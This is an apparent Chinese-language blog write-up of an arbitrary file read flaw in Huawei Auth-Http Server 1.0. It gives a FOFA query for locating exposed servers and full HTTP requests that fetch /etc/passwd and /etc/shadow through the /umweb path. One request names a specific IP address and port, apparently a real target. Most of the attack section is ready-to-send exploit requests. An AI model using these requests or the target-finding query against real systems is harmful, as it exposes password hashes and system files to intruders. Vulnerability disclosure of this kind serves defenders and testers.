华为Auth-HTTP服务器任意文件读取漏洞

华为Auth-Http Server 1.0存在任意文件读取,攻击者可通过该漏洞读取任意文件。

1.漏洞级别

高危

2.漏洞搜索

fofa

复制代码
server="Huawei Auth-Http Server 1.0"

3.漏洞复现

构造

复制代码
GET /umweb/passwd HTTP/1.1
Host: 
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

即可成功获取数据
同理,构造

复制代码
GET /umweb/shadow HTTP/1.1
Host: 60.23.25.42:8887
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:120.0) Gecko/20100101 Firefox/120.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: none
Sec-Fetch-User: ?1
Te: trailers
Connection: close

这里的umweb路径等价于/etc,后面接文件的地址

复制代码
/umweb/passwd = /etc/passwd
同理还可以访问
/umweb/shadow
/umweb/hosts等敏感文件

注:可惜的是这个漏洞无法跨越目录访问,只能在/etc目录下进行访问,因此利用价值相对有限,无法获得过多的敏感数据,属于是是个鸡肋漏洞了。

相关推荐
小江的记录本18 分钟前
【网络安全】《网络安全常见攻击与防御》(附:《六大攻击核心特性横向对比表》)
java·网络·人工智能·后端·python·安全·web安全
积水成渊,蛟龙生焉35 分钟前
鸿蒙装饰器V2详解
华为·harmonyos·arkts·鸿蒙·ark
zuowei28891 小时前
华为网络设备配置文件备份与恢复(上传、下载、导出,导入)
开发语言·华为·php
其实防守也摸鱼2 小时前
无线网络安全---WLAN相关安全工具--kali(理论附题目)
linux·安全·web安全·学习笔记·kali·命令模式·wlan
℡終嚸♂6803 小时前
FlowiseAI 任意文件上传 CTF Writeup
sql·web安全
white-persist4 小时前
【vulhub shiro 漏洞复现】vulhub shiro CVE-2016-4437 Shiro反序列化漏洞复现详细分析解释
运维·服务器·网络·python·算法·安全·web安全
C雨后彩虹5 小时前
最多等和不相交连续子序列
java·数据结构·算法·华为·面试
不灭锦鲤6 小时前
网络安全学习第59天
学习·安全·web安全
liulian09168 小时前
Flutter 三方库 flutter_local_auth 的鸿蒙化适配指南
flutter·华为·学习方法·harmonyos
SuperHeroWu78 小时前
【鸿蒙基础入门】概念理解和学习方法论说明
前端·学习·华为·开源·harmonyos·鸿蒙·移动端